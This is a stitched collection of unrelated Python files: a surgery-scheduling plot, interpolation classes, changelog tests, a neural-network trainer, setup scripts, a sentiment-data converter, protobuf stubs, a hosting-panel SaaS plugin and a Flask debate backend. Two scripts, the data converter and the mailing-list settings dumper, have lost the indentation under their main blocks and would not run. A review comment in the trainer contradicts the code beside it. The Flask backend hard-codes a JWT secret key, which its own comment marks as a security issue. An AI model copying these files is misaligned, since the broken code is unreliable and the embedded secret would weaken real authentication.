                print("\n")
        print("Total number of operated patients: " + str(operated_patients))

    def plot_graph(self, solution):
        """Show a plotly timeline of the scheduled surgeries.

        Each day starts at 08:00; patient.order is the start offset in minutes
        and patient.operatingTime the duration in minutes.
        """
        if solution is None:
            print("No solution exists to be plotted!")
            return
        K, T = max(solution.keys())
        dff = pd.DataFrame([])
        for t in range(1, T + 1):
            df = pd.DataFrame([])
            for k in range(1, K + 1):
                # iterate the patients directly — no index bookkeeping needed
                for patient in solution[(k, t)]:
                    start = datetime.datetime(1970, 1, t, 8, 0, 0) + datetime.timedelta(minutes=round(patient.order))
                    finish = start + datetime.timedelta(minutes=round(patient.operatingTime))
                    row = pd.DataFrame([dict(
                        Start=start,
                        Finish=finish,
                        Room="S" + str(k),
                        Covid="Y" if patient.covid == 1 else "N",
                        Anesthesia="Y" if patient.anesthesia == 1 else "N",
                        Anesthetist="A" + str(patient.anesthetist) if patient.anesthetist != 0 else "",
                    )])
                    df = pd.concat([df, row])
            # (the previous version also kept an unused dataFrames list here)
            dff = pd.concat([df, dff])
        fig = px.timeline(dff,
                          x_start="Start",
                          x_end="Finish",
                          y="Room",
                          color="Covid",
                          text="Anesthetist",
                          labels={"Start": "Surgery start", "Finish": "Surgery end", "Room": "Operating room",
                                  "Covid": "Covid patient", "Anesthesia": "Need for anesthesia", "Anesthetist": "Anesthetist"},
                          hover_data=["Anesthesia", "Anesthetist"]
                          )
        fig.update_layout(xaxis=dict(title='Timetable', tickformat='%H:%M:%S',))
        fig.show()
|
"""
Linear INterpolation Functions.
theta refers to the full set of parameters for an adaptive linear interpolation model,
[n, y0, x1, y1, x2, y2, ..., x_n, y_n, y_n+1],
where n is the greatest allowed value of floor(n).
The reason for the interleaving of x and y is it avoids the need to know n.
"""
import numpy as np
from linf.helper_functions import (
get_theta_n,
get_x_nodes_from_theta,
get_y_nodes_from_theta,
)
class Linf:
    """
    Linear interpolation function with end nodes fixed at x_min and x_max.

    x_min: float
    x_max: float > x_min

    Calling the instance evaluates linf(x, theta), where
    theta = [y0, x1, y1, x2, y2, ..., x_(N-2), y_(N-2), y_(N-1)] for N nodes.
    """

    def __init__(self, x_min, x_max):
        self.x_min = x_min
        self.x_max = x_max

    def __call__(self, x, theta):
        """
        Evaluate the linf at x.

        y0 and y_(N-1) are the y values corresponding to x_min and x_max
        respectively. A single-element theta gives a constant function at
        that value; an empty theta gives a constant -1 (cosmology!).
        """
        n_params = len(theta)
        if n_params == 0:
            return np.full_like(x, -1)
        if n_params == 1:
            return np.full_like(x, theta[-1])
        xs = np.concatenate(
            ([self.x_min], get_x_nodes_from_theta(theta), [self.x_max])
        )
        return np.interp(x, xs, get_y_nodes_from_theta(theta))
class AdaptiveLinf(Linf):
    """
    Adaptive linf which allows the number of parameters being used to vary.

    x_min: float
    x_max: float > x_min

    Returns:
    adaptive_linf(x, theta)

    The first element of theta is N; floor(N)-2 is the number of interior
    nodes used in the linear interpolation model.
    theta = [N, y0, x1, y1, x2, y2, ..., x_(Nmax-2), y_(Nmax-2), y_(Nmax-1)],
    where Nmax is the greatest allowed value of floor(N).
    If floor(N) = 1, the linf is constant at theta[-1] = y_(Nmax-1).
    If floor(N) = 0, the linf is constant at -1 (cosmology!).
    """
    def __call__(self, x, theta):
        """
        Evaluate the adaptive linf at x.

        The first element of theta is N; floor(N)-2 is the number of interior
        nodes used in the linear interpolation model. get_theta_n() uses N to
        select the appropriate other elements of theta, which are then passed
        to the fixed-size Linf.__call__().
        """
        # delegate to Linf with the parameter subset chosen by N
        return super().__call__(x, get_theta_n(theta))
|
# Copyright Contributors to the Packit project.
# SPDX-License-Identifier: MIT
import datetime
import dateutil.tz
from specfile.changelog import Changelog, ChangelogEntry
from specfile.sections import Section
def test_parse():
    """Changelog.parse orders entries oldest-first and flags extended timestamps."""
    changelog = Changelog.parse(
        Section(
            "changelog",
            [
                "* Thu Jan 13 08:12:41 UTC 2022 Nikola Forró <nforro@redhat.com> - 0.2-2",
                "- rebuilt",
                "",
                "* Mon Oct 18 12:34:45 CEST 2021 Nikola Forró <nforro@redhat.com> - 0.2-1",
                "- new upstream release",
                "",
                "* Thu Jul 22 2021 Fedora Release Engineering <releng@fedoraproject.org> - 0.1-2",
                "- Rebuilt for https://fedoraproject.org/wiki/Fedora_35_Mass_Rebuild",
                "",
                "* Tue May 04 2021 Nikola Forró <nforro@redhat.com> - 0.1-1",
                "- first version",
                " resolves: #999999999",
            ],
        )
    )
    # (header, content, has extended timestamp) per entry, oldest first
    expected = [
        (
            "* Tue May 04 2021 Nikola Forró <nforro@redhat.com> - 0.1-1",
            ["- first version", " resolves: #999999999"],
            False,
        ),
        (
            "* Thu Jul 22 2021 Fedora Release Engineering <releng@fedoraproject.org> - 0.1-2",
            ["- Rebuilt for https://fedoraproject.org/wiki/Fedora_35_Mass_Rebuild"],
            False,
        ),
        (
            "* Mon Oct 18 12:34:45 CEST 2021 Nikola Forró <nforro@redhat.com> - 0.2-1",
            ["- new upstream release"],
            True,
        ),
        (
            "* Thu Jan 13 08:12:41 UTC 2022 Nikola Forró <nforro@redhat.com> - 0.2-2",
            ["- rebuilt"],
            True,
        ),
    ]
    assert len(changelog) == len(expected)
    for i, (header, content, extended) in enumerate(expected):
        assert changelog[i].header == header
        assert changelog[i].content == content
        assert bool(changelog[i].extended_timestamp) == extended
def test_get_raw_section_data():
    """Entries assembled oldest-first are rendered newest-first as raw lines."""
    changelog = Changelog(
        [
            # date-only entry, no trailing blank line after its content
            ChangelogEntry.assemble(
                datetime.date(2021, 5, 4),
                "Nikola Forró <nforro@redhat.com>",
                ["- first version", " resolves: #999999999"],
                "0.1-1",
                append_newline=False,
            ),
            ChangelogEntry.assemble(
                datetime.date(2021, 7, 22),
                "Fedora Release Engineering <releng@fedoraproject.org>",
                ["- Rebuilt for https://fedoraproject.org/wiki/Fedora_35_Mass_Rebuild"],
                "0.1-2",
            ),
            # timezone-aware datetime -> extended (time + zone) header format
            ChangelogEntry.assemble(
                datetime.datetime(
                    2021, 10, 18, 12, 34, 45, tzinfo=dateutil.tz.gettz("CET")
                ),
                "Nikola Forró <nforro@redhat.com>",
                ["- new upstream release"],
                "0.2-1",
            ),
            # naive datetime -> rendered as UTC in the header
            ChangelogEntry.assemble(
                datetime.datetime(2022, 1, 13, 8, 12, 41),
                "Nikola Forró <nforro@redhat.com>",
                ["- rebuilt"],
                "0.2-2",
            ),
        ]
    )
    assert changelog.get_raw_section_data() == [
        "* Thu Jan 13 08:12:41 UTC 2022 Nikola Forró <nforro@redhat.com> - 0.2-2",
        "- rebuilt",
        "",
        "* Mon Oct 18 12:34:45 CEST 2021 Nikola Forró <nforro@redhat.com> - 0.2-1",
        "- new upstream release",
        "",
        "* Thu Jul 22 2021 Fedora Release Engineering <releng@fedoraproject.org> - 0.1-2",
        "- Rebuilt for https://fedoraproject.org/wiki/Fedora_35_Mass_Rebuild",
        "",
        "* Tue May 04 2021 Nikola Forró <nforro@redhat.com> - 0.1-1",
        "- first version",
        " resolves: #999999999",
    ]
|
from typing import Union
import torch.nn as nn
import torch.utils.data
from mighty.trainer.gradient import TrainerGrad
from mighty.utils.common import find_layers
from mighty.utils.data import DataLoader
from torch.optim.lr_scheduler import _LRScheduler, ReduceLROnPlateau
from utils.layers import BinaryDecoratorSoft, binarize_model
class HardnessScheduler:
    """
    BinaryDecoratorSoft hardness scheduler.

    Multiplies the hardness of every BinaryDecoratorSoft layer in the model
    by `gamma_hardness` every `step_size` epochs, capped at `max_hardness`.
    """

    def __init__(self, model: nn.Module, step_size: int, gamma_hardness=2.0, max_hardness=10):
        self.binsoft_layers = tuple(find_layers(model, layer_class=BinaryDecoratorSoft))
        self.step_size = step_size
        self.gamma_hardness = gamma_hardness
        self.max_hardness = max_hardness
        self.epoch = 0

    def need_update(self):
        """Return True when the current epoch is a non-zero multiple of step_size."""
        return self.epoch > 0 and self.epoch % self.step_size == 0

    def step(self, epoch: int = None):
        """Advance one epoch (or jump to `epoch`) and update hardness if due.

        `epoch` defaults to None: TrainerGradBinarySoft._epoch_finished()
        calls step() with no argument, which previously raised TypeError
        because the parameter had no default.

        Returns True when the layers' hardness was updated.
        """
        updated = False
        if epoch:
            self.epoch = epoch
        else:
            # this function is called just _before_ the completion of an epoch
            # in the _epoch_finished() function
            self.epoch += 1
        if self.need_update():
            for layer in self.binsoft_layers:
                layer.hardness = min(layer.hardness * self.gamma_hardness, self.max_hardness)
            updated = True
        return updated

    def extra_repr(self):
        return f"step_size={self.step_size}," \
               f"Hardness(gamma={self.gamma_hardness}," \
               f"max={self.max_hardness})"

    def __repr__(self):
        return f"{self.__class__.__name__}({self.extra_repr()})"
class TrainerGradBinarySoft(TrainerGrad):
    # Gradient trainer that first wraps the model's layers with
    # BinaryDecoratorSoft and optionally anneals their hardness per epoch.
    def __init__(self, model: nn.Module, criterion: nn.Module, data_loader: DataLoader,
                 optimizer: torch.optim.Optimizer,
                 scheduler: Union[_LRScheduler, ReduceLROnPlateau, None] = None,
                 hardness_scheduler: HardnessScheduler = None,
                 **kwargs):
        # binarize before handing the model to the base trainer so the
        # optimizer and monitors see the wrapped layers
        model = binarize_model(model, binarizer=BinaryDecoratorSoft)
        super().__init__(model, criterion, data_loader=data_loader, optimizer=optimizer, scheduler=scheduler, **kwargs)
        self.hardness_scheduler = hardness_scheduler
    def monitor_functions(self):
        """Register a per-epoch hardness plot when a hardness scheduler is set."""
        super().monitor_functions()
        def hardness(viz):
            # one curve per BinaryDecoratorSoft layer, log-scaled y axis
            viz.line_update(y=list(layer.hardness for layer in self.hardness_scheduler.binsoft_layers), opts=dict(
                xlabel='Epoch',
                ylabel='hardness',
                title='BinaryDecoratorSoft tanh hardness',
                ytype='log',
            ))
        if self.hardness_scheduler is not None:
            self.monitor.register_func(hardness)
    def _epoch_finished(self, loss):
        super()._epoch_finished(loss)
        if self.hardness_scheduler is not None:
            # NOTE(review): HardnessScheduler.step() is declared as
            # step(self, epoch) with no default — this no-argument call
            # raises TypeError unless `epoch` is given a default; confirm.
            self.hardness_scheduler.step()
|
from setuptools import setup
from setuptools import find_packages
from codecs import open
from os import path

# Package version; bump on release.
# (Previously this assignment sat inside a stray, unterminated `setup(` call,
# which made the whole file a SyntaxError.)
VERSION = '0.0.0'

here = path.abspath(path.dirname(__file__))

# use the README as the long description shown on PyPI
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
    long_description = f.read()

setup(
    name='auditdb',
    version=VERSION,
    description='allow to audit changes of data',
    long_description=long_description,  # was read but never passed before
    url='https://github.com/affinitas/audit-addon',
    author='Claus Koch',
    author_email='claus.koch@affinitas.de',
    license='MIT',
    classifiers=[
        'Development Status :: 2 - Pre-Alpha',
        'Intended Audience :: Developers',
        'Intended Audience :: System Administrators',
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python :: 3.4',
    ],
    keywords='postgresql audit addon',
    packages=find_packages(exclude=['contrib', 'docs', 'tests*']),
)
|
import os
import sys
import random
def read_write_1(infile, ofile):
    """Shuffle `infile` ("label text" lines) and write it to `ofile`
    as "text<TAB>label" lines."""
    with open(ofile, 'w') as out_f:
        with open(infile, 'r', errors='ignore') as in_f:
            lines = in_f.readlines()
            random.shuffle(lines)
            for raw in lines:
                # split off the leading label, keep the rest of the line intact
                label, text = raw.split(' ', 1)
                out_f.write(text.strip() + '\t' + label.strip() + '\n')
def read_write_2(infile, ofile, split):
    """Shuffle `infile` ("label text" lines), convert each line to
    "text<TAB>label", and write train/dev/test TSVs (each with a
    'sentence\\tlabel' header row) under the `ofile` path prefix.

    split: [train_end, dev_end] — slice boundaries into the shuffled data.
    """
    converted = []
    with open(infile, 'r', errors='ignore') as in_f:
        lines = in_f.readlines()
        random.shuffle(lines)
        for line in lines:
            label, text = line.split(' ', 1)
            converted.append(text.strip() + '\t' + label.strip())
    head = 'sentence\tlabel'
    # map each output file straight to its slice instead of the previous
    # name/value parallel lists resolved with eval()
    splits = {
        'train.tsv': converted[:split[0]],
        'dev.tsv': converted[split[0]:split[1]],
        'test.tsv': converted[split[1]:],
    }
    for name, data in splits.items():
        with open(ofile + name, 'w') as f:
            f.write(head + '\n')
            for line in data:
                f.write(line + '\n')
if __name__ == "__main__":
random.seed(1)
#### SST2
indir = '/home/juncsu/Code/Data/sentiment_dataset/data/'
odir = '/home/juncsu/Code/Data/CapsData/SST-2/'
infiles = [indir + 'stsa.fine.train', indir + 'stsa.fine.dev', indir + 'stsa.fine.test']
ofiles = [odir + 'train.tsv', odir + 'dev.tsv', odir + 'test.tsv']
for i in range(3):
read_write_1(infiles[i], ofiles[i])
#### SST1
indir = '/home/juncsu/Code/Data/sentiment_dataset/data/'
odir = '/home/juncsu/Code/Data/CapsData/SST-1/'
infiles = [indir + 'stsa.binary.train', indir + 'stsa.binary.dev', indir + 'stsa.binary.test']
ofiles = [odir + 'train.tsv', odir + 'dev.tsv', odir + 'test.tsv']
for i in range(3):
read_write_1(infiles[i], ofiles[i])
#### mpqa
split = [8587,9542]
indir = '/home/juncsu/Code/Data/sentiment_dataset/data/'
odir = '/home/juncsu/Code/Data/CapsData/MPQA/'
infile = indir + 'mpqa.all'
read_write_2(infile, odir, split)
## subj
split = [9000,9001]
indir = '/home/juncsu/Code/Data/sentiment_dataset/data/'
odir = '/home/juncsu/Code/Data/CapsData/SUBJ/'
infile = indir + 'subj.all'
read_write_2(infile, odir, split)
|
#!/usr/bin/env python3
import logging
import common
if __name__ == "__main__":
# setup args and logging
args = common.setup_args(domain=common.ArgMod.REQUIRED, llist=common.ArgMod.REQUIRED)
common.setup_logging(args.verbose)
fqdn_listname = "{}@{}".format(args.llist, args.domain)
logging.info("searching for list: {} ...".format(fqdn_listname))
# setup client
client = common.new_client()
# fetch list
llist = common.fetch_list(client, fqdn_listname)
for attr in sorted(llist.settings):
print("{}: {}".format(attr, llist.settings[attr]))
|
from pathlib import Path
from zeep.exceptions import Fault
# package root directory (the folder containing this module)
ROOT_DIR: Path = Path(__file__).parent
# most recent CUCM schema version this package targets
CUCM_LATEST_VERSION: str = "14.0"
# NOTE(review): the purpose of these magic-key strings is not visible here —
# presumably internal sentinel values; confirm before changing them.
USERNAME_MAGIC_KEY: str = "73q0eWFaIE2JJw8FMNeX"
URL_MAGIC_KEY: str = "8Cu16DGzNvunSsDNOTrO"
DUMMY_KEY: str = "xlGoVnofkKjNSgnwA9Z7"
# feature toggles flipped by the turn_off_* helpers below
DISABLE_SERIALIZER = False
DISABLE_CHECK_TAGS = False
DISABLE_CHECK_ARGS = False
# def turn_off_serializer() -> None:
#     global DISABLE_SERIALIZER
#     DISABLE_SERIALIZER = True
def turn_off_tags_checker() -> None:
    """Disable tag checking for the rest of the process (module-wide toggle)."""
    global DISABLE_CHECK_TAGS
    DISABLE_CHECK_TAGS = True
def turn_off_args_checker() -> None:
    """Disable argument checking for the rest of the process (module-wide toggle)."""
    global DISABLE_CHECK_ARGS
    DISABLE_CHECK_ARGS = True
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# sources: atomix/value/value.proto
# plugin: python-betterproto
from dataclasses import dataclass
from typing import AsyncGenerator, Optional
import betterproto
from atomix.proto import headers
class EventResponseType(betterproto.Enum):
    # event emitted when the stored value changes
    UPDATED = 0
# Request/response message pairs for the value-service RPCs (generated code —
# regenerate from atomix/value/value.proto rather than hand-editing).
# Every message carries a headers.RequestHeader/ResponseHeader.
@dataclass
class CreateRequest(betterproto.Message):
    header: headers.RequestHeader = betterproto.message_field(1)
@dataclass
class CreateResponse(betterproto.Message):
    header: headers.ResponseHeader = betterproto.message_field(1)
@dataclass
class CloseRequest(betterproto.Message):
    header: headers.RequestHeader = betterproto.message_field(1)
    # when True, the value is deleted as the session closes
    delete: bool = betterproto.bool_field(2)
@dataclass
class CloseResponse(betterproto.Message):
    header: headers.ResponseHeader = betterproto.message_field(1)
@dataclass
class GetRequest(betterproto.Message):
    header: headers.RequestHeader = betterproto.message_field(1)
@dataclass
class GetResponse(betterproto.Message):
    header: headers.ResponseHeader = betterproto.message_field(1)
    value: bytes = betterproto.bytes_field(2)
    version: int = betterproto.uint64_field(3)
@dataclass
class SetRequest(betterproto.Message):
    header: headers.RequestHeader = betterproto.message_field(1)
    # expect_* fields make the set conditional (compare-and-set)
    expect_version: int = betterproto.uint64_field(2)
    expect_value: bytes = betterproto.bytes_field(3)
    value: bytes = betterproto.bytes_field(4)
@dataclass
class SetResponse(betterproto.Message):
    header: headers.ResponseHeader = betterproto.message_field(1)
    version: int = betterproto.uint64_field(2)
    succeeded: bool = betterproto.bool_field(3)
@dataclass
class EventRequest(betterproto.Message):
    header: headers.RequestHeader = betterproto.message_field(1)
@dataclass
class EventResponse(betterproto.Message):
    header: headers.ResponseHeader = betterproto.message_field(1)
    type: "EventResponseType" = betterproto.enum_field(2)
    # previous_*/new_* describe the value transition for the event
    previous_value: bytes = betterproto.bytes_field(3)
    previous_version: int = betterproto.uint64_field(4)
    new_value: bytes = betterproto.bytes_field(5)
    new_version: int = betterproto.uint64_field(6)
class ValueServiceStub(betterproto.ServiceStub):
    """ValueService implements a distributed atomic value.

    Generated client stub (python-betterproto); each method builds the
    request message and performs the corresponding gRPC call.
    """
    async def create(
        self, *, header: Optional[headers.RequestHeader] = None
    ) -> CreateResponse:
        """Create creates a new value session"""
        request = CreateRequest()
        if header is not None:
            request.header = header
        return await self._unary_unary(
            "/atomix.value.ValueService/Create", request, CreateResponse,
        )
    async def close(
        self, *, header: Optional[headers.RequestHeader] = None, delete: bool = False
    ) -> CloseResponse:
        """Close closes the value session"""
        request = CloseRequest()
        if header is not None:
            request.header = header
        request.delete = delete
        return await self._unary_unary(
            "/atomix.value.ValueService/Close", request, CloseResponse,
        )
    async def set(
        self,
        *,
        header: Optional[headers.RequestHeader] = None,
        expect_version: int = 0,
        expect_value: bytes = b"",
        value: bytes = b"",
    ) -> SetResponse:
        """Set sets the value"""
        # expect_version/expect_value make this a conditional (compare-and-set) write
        request = SetRequest()
        if header is not None:
            request.header = header
        request.expect_version = expect_version
        request.expect_value = expect_value
        request.value = value
        return await self._unary_unary(
            "/atomix.value.ValueService/Set", request, SetResponse,
        )
    async def get(
        self, *, header: Optional[headers.RequestHeader] = None
    ) -> GetResponse:
        """Get gets the value"""
        request = GetRequest()
        if header is not None:
            request.header = header
        return await self._unary_unary(
            "/atomix.value.ValueService/Get", request, GetResponse,
        )
    async def events(
        self, *, header: Optional[headers.RequestHeader] = None
    ) -> AsyncGenerator[EventResponse, None]:
        """Events listens for value change events"""
        # server-streaming call: yields one EventResponse per change
        request = EventRequest()
        if header is not None:
            request.header = header
        async for response in self._unary_stream(
            "/atomix.value.ValueService/Events", request, EventResponse,
        ):
            yield response
|
import importlib
import os
from functools import lru_cache
from urllib.parse import urlparse
from django.core.exceptions import ValidationError, ObjectDoesNotExist
from django.utils.translation import ugettext_lazy as _
from orchestra import plugins
from orchestra.contrib.databases.models import Database, DatabaseUser
from orchestra.contrib.orchestration import Operation
from orchestra.contrib.websites.models import Website, WebsiteDirective
from orchestra.utils.apps import isinstalled
from orchestra.utils.functional import cached
from orchestra.utils.python import import_class
from . import helpers
from .. import settings
from ..forms import SaaSPasswordForm
class SoftwareService(plugins.Plugin, metaclass=plugins.PluginMount):
    """Base plugin for a Software-as-a-Service offering.

    Subclasses set name/verbose_name/site_domain etc.; the base class wires
    the service into the websites app via WebsiteDirective objects when a
    custom URL is allowed.
    """
    # maps a URL scheme to (protocol to create, protocols accepted on lookup)
    PROTOCOL_MAP = {
        'http': (Website.HTTP, (Website.HTTP, Website.HTTP_AND_HTTPS)),
        'https': (Website.HTTPS_ONLY, (Website.HTTPS, Website.HTTP_AND_HTTPS, Website.HTTPS_ONLY)),
    }
    name = None
    verbose_name = None
    form = SaaSPasswordForm
    # %-format template for the service's site domain, see get_site_domain()
    site_domain = None
    has_custom_domain = False
    icon = 'orchestra/icons/apps.png'
    class_verbose_name = _("Software as a Service")
    plugin_field = 'service'
    allow_custom_url = False
    @classmethod
    @lru_cache()
    def get_plugins(cls, all=False):
        """Return enabled service plugins, or every plugin when all=True."""
        if all:
            # import every sibling module so their plugin classes register
            for module in os.listdir(os.path.dirname(__file__)):
                if module not in ('options.py', '__init__.py') and module[-3:] == '.py':
                    importlib.import_module('.'+module[:-3], __package__)
            # NOTE(review): this local 'plugins' shadows the module-level
            # 'orchestra.plugins' import inside this method
            plugins = super().get_plugins()
        else:
            plugins = []
            # NOTE(review): the loop variable 'cls' shadows the classmethod
            # argument; harmless here since cls is not used afterwards
            for cls in settings.SAAS_ENABLED_SERVICES:
                plugins.append(import_class(cls))
        return plugins
    # NOTE(review): takes 'cls' but has no @classmethod decorator — looks
    # like the decorator is missing; confirm how callers invoke this.
    def get_change_readonly_fields(cls):
        fields = super(SoftwareService, cls).get_change_readonly_fields()
        return fields + ('name',)
    def get_site_domain(self):
        """Render the class's site_domain template with the instance name."""
        context = {
            'site_name': self.instance.name,
            'name': self.instance.name,
        }
        return self.site_domain % context
    def clean(self):
        """Reject custom URLs unless the service allows them."""
        if self.allow_custom_url:
            if self.instance.custom_url:
                if isinstalled('orchestra.contrib.websites'):
                    helpers.clean_custom_url(self)
        elif self.instance.custom_url:
            raise ValidationError({
                'custom_url': _("Custom URL not allowed for this service."),
            })
    def clean_data(self):
        """On creation, run the backend 'validate_creation' action and map
        its stdout markers to field-level validation errors."""
        data = super(SoftwareService, self).clean_data()
        if not self.instance.pk:
            try:
                log = Operation.execute_action(self.instance, 'validate_creation')[0]
            except IndexError:
                # no operation was scheduled for this instance; nothing to check
                pass
            else:
                if log.state != log.SUCCESS:
                    raise ValidationError(_("Validate creation execution has failed."))
                errors = {}
                if 'user-exists' in log.stdout:
                    errors['name'] = _("User with this username already exists.")
                if 'email-exists' in log.stdout:
                    errors['email'] = _("User with this email address already exists.")
                if errors:
                    raise ValidationError(errors)
        return data
    def get_directive_name(self):
        """Directive name that marks a website as serving this SaaS."""
        return '%s-saas' % self.name
    def get_directive(self, *args):
        """Return the WebsiteDirective matching the (optionally given)
        instance's custom URL, scheme, domain and account."""
        if not args:
            instance = self.instance
        else:
            instance = args[0]
        url = urlparse(instance.custom_url)
        account = instance.account
        return WebsiteDirective.objects.get(
            name=self.get_directive_name(),
            value=url.path,
            website__protocol__in=self.PROTOCOL_MAP[url.scheme][1],
            website__domains__name=url.netloc,
            website__account=account,
        )
    def get_website(self):
        """Return the Website currently serving this instance's custom URL."""
        url = urlparse(self.instance.custom_url)
        account = self.instance.account
        return Website.objects.get(
            protocol__in=self.PROTOCOL_MAP[url.scheme][1],
            domains__name=url.netloc,
            account=account,
            directives__name=self.get_directive_name(),
            directives__value=url.path,
        )
    def create_or_update_directive(self):
        return helpers.create_or_update_directive(self)
    def delete_directive(self):
        """Delete the directive attached to the *previously saved* custom URL,
        if any (looks up the old DB state of the instance)."""
        directive = None
        try:
            old = type(self.instance).objects.get(pk=self.instance.pk)
            if old.custom_url:
                directive = self.get_directive(old)
        except ObjectDoesNotExist:
            return
        if directive is not None:
            directive.delete()
    def save(self):
        # pre instance.save()
        if isinstalled('orchestra.contrib.websites'):
            if self.instance.custom_url:
                self.create_or_update_directive()
            elif self.instance.pk:
                # custom URL removed: drop the stale directive
                self.delete_directive()
    def delete(self):
        if isinstalled('orchestra.contrib.websites'):
            self.delete_directive()
    def get_related(self):
        """Hook for subclasses to report related objects; none by default."""
        return []
class DBSoftwareService(SoftwareService):
    """SoftwareService variant that provisions a MySQL database for the
    service instance, owned by the main system account."""
    # %-format template for the database name, see get_db_name()
    db_name = None
    # username of the pre-existing global database user
    db_user = None
    abstract = True
    def get_db_name(self):
        """Render the db_name template with the instance name."""
        context = {
            'name': self.instance.name,
            'site_name': self.instance.name,
        }
        db_name = self.db_name % context
        # Limit for mysql database names
        return db_name[:65]
    def get_db_user(self):
        return self.db_user
    @cached
    def get_account(self):
        # resolve the Account model via the instance's 'account' FK and
        # return the main (system) account
        account_model = self.instance._meta.get_field('account')
        return account_model.remote_field.model.objects.get_main()
    def validate(self):
        """On creation, check the global DB user exists and the new database
        name passes model validation."""
        super(DBSoftwareService, self).validate()
        create = not self.instance.pk
        if create:
            account = self.get_account()
            # Validated Database
            db_user = self.get_db_user()
            try:
                DatabaseUser.objects.get(username=db_user)
            except DatabaseUser.DoesNotExist:
                # NOTE(review): message hard-codes "PHPList" although this is
                # a generic base class, and "does not exists" is a typo —
                # confirm before changing this user-facing string.
                raise ValidationError(
                    _("Global database user for PHPList '%(db_user)s' does not exists.") % {
                        'db_user': db_user
                    }
                )
            db = Database(name=self.get_db_name(), account=account)
            try:
                db.full_clean()
            except ValidationError as e:
                raise ValidationError({
                    'name': e.messages,
                })
    def save(self):
        """Create (or fetch) the database, grant the global user access and
        remember its pk on the instance."""
        super(DBSoftwareService, self).save()
        account = self.get_account()
        # Database
        db_name = self.get_db_name()
        db_user = self.get_db_user()
        db, db_created = account.databases.get_or_create(name=db_name, type=Database.MYSQL)
        user = DatabaseUser.objects.get(username=db_user)
        db.users.add(user)
        # stored on the in-memory instance only; persisted by the caller's save
        self.instance.database_id = db.pk
|
#!/usr/bin/env python
# coding=utf-8
from functools import wraps
from flask import abort
from flask.ext.login import current_user
from .models import Permission
def permission_required(permission):
    """Decorator factory: abort with 403 unless current_user has `permission`."""
    def decorator(view_func):
        @wraps(view_func)
        def wrapped(*args, **kwargs):
            if current_user.can(permission):
                return view_func(*args, **kwargs)
            abort(403)  # raises, so this is the only alternative path
        return wrapped
    return decorator
def admin_required(func):
    """Shortcut for @permission_required(Permission.ADMIN)."""
    return permission_required(Permission.ADMIN)(func)
|
import os
import re
from setuptools import find_packages, setup
# read __version__ straight out of the package source so it is defined
# in exactly one place
with open(
    os.path.join(os.path.dirname(__file__), 'src', 'apialchemy', '__init__.py')
) as v_file:
    VERSION = (
        re.compile(r""".*__version__ = ["']([^\n]*)['"]""", re.S)
        .match(v_file.read())
        .group(1)
    )
# README becomes the long description shown on PyPI
with open(os.path.join(os.path.dirname(__file__), 'README.md')) as r_file:
    readme = r_file.read()
setup(name='APIAlchemy',
      version=VERSION,
      description='API toolkit for Python, modeled after SQLAlchemy',
      long_description=readme,
      long_description_content_type='text/markdown',
      license='MIT',
      url='https://github.com/homedepot/apialchemy',
      author='Mike Phillipson',
      author_email='MICHAEL_PHILLIPSON1@homedepot.com',
      packages=find_packages('src'),
      package_dir={'': 'src'},  # src/ layout: packages live under src/
      install_requires=[
          'AppDynamicsRESTx',
          'orionsdk',
          'prometheus_client',
          'prometheus-api-client',
          'PyGithub',
          'splunk-sdk'
      ],
      zip_safe=False)
|
import datetime
import os
import json
import logging
from datetime import timedelta
from logging.config import fileConfig
from logging.handlers import RotatingFileHandler
from flask import Flask, Response, request
from flask_mongoengine import MongoEngine
from flask_cors import CORS
from flask_jwt_extended import JWTManager, jwt_required, create_access_token, create_refresh_token, get_jwt_identity
from flask_bcrypt import Bcrypt
from jsonschema import validate
from jsonschema.exceptions import ValidationError
from jsonschema.exceptions import SchemaError
# Log settings
fileConfig('./log_config.ini')
logger = logging.getLogger('debate_backend_logger')
handler = RotatingFileHandler(
    'logs/debate_backend_logger.log', maxBytes=10000, backupCount=10)
handler.setLevel(logging.INFO)
app = Flask(__name__)
CORS(app)
# MongoDB connection settings come from the environment
app.config['MONGODB_SETTINGS'] = {
    'host': os.environ['MONGODB_HOST'],
    'username': os.environ['MONGODB_USERNAME'],
    'password': os.environ['MONGODB_PASSWORD'],
    'db': 'debate_web'
}
# SECURITY: hard-coded JWT secret committed to source — move this to an
# environment variable or secret store before deploying
app.config['JWT_SECRET_KEY'] = 'sampleSecretKey'
app.config['JWT_ACCESS_TOKEN_EXPIRES'] = timedelta(hours=24)
app.config['JWT_REFRESH_LIFESPAN'] = {'days': 30}
app.logger.addHandler(handler)
db = MongoEngine()
db.init_app(app)
flask_bcrypt = Bcrypt(app)
jwt = JWTManager(app)
class UserInfo(db.Document):
    # registered user; password holds a bcrypt hash, not plaintext
    id = db.SequenceField(primary_key=True)
    email = db.StringField(unique=True)
    password = db.StringField()
    name = db.StringField()
    role = db.StringField(default="Participant")  # "Participant" or "Manager"
    del_flg = db.StringField(default="0")  # soft-delete flag ("0" = active)
class Topics(db.Document):
    # a debate topic with its title, short header and body text
    id = db.SequenceField(primary_key=True)
    title = db.StringField()
    header = db.StringField()
    content = db.StringField()
class DebateDetails(db.Document):
    # one debate post under a topic
    id = db.SequenceField(primary_key=True)
    topic_num = db.IntField()  # Topics.id this post belongs to
    writer = db.IntField()  # UserInfo.id of the author
    content = db.StringField()
    create_on = db.DateTimeField(default=datetime.datetime.utcnow)
    update_on = db.DateTimeField(default=datetime.datetime.utcnow)
class LikeOnDebate(db.Document):
    # one "like" by user_id on the debate post debate_num
    id = db.SequenceField(primary_key=True)
    debate_num = db.IntField()
    user_id = db.IntField()
class UnLikeOnDebate(db.Document):
    # one "unlike" by user_id on the debate post debate_num
    id = db.SequenceField(primary_key=True)
    debate_num = db.IntField()
    user_id = db.IntField()
def validate_for_auth(auth_data):
    """Validate a login/signup payload against the user JSON schema.

    Returns {'result': True, 'data': auth_data} on success, or
    {'result': False, 'message': <exception>} on a schema/validation error.
    """
    user_schema = {
        "type": "object",
        "properties": {
            "name": {
                "type": "string",
            },
            "email": {
                "type": "string",
                "format": "email"
            },
            "password": {
                "type": "string",
                "minLength": 8
            }
        },
        "required": ["email", "password"],
        "additionalProperties": False
    }
    try:
        validate(auth_data, user_schema)
    except (ValidationError, SchemaError) as e:
        # both error kinds are reported the same way
        return {'result': False, 'message': e}
    return {'result': True, 'data': auth_data}
@app.route('/api/auth', methods=['POST'])
def auth_login():
    """Authenticate a user and return JWT access/refresh tokens.

    Responds {"result": false} (HTTP 200) on any failure — bad payload,
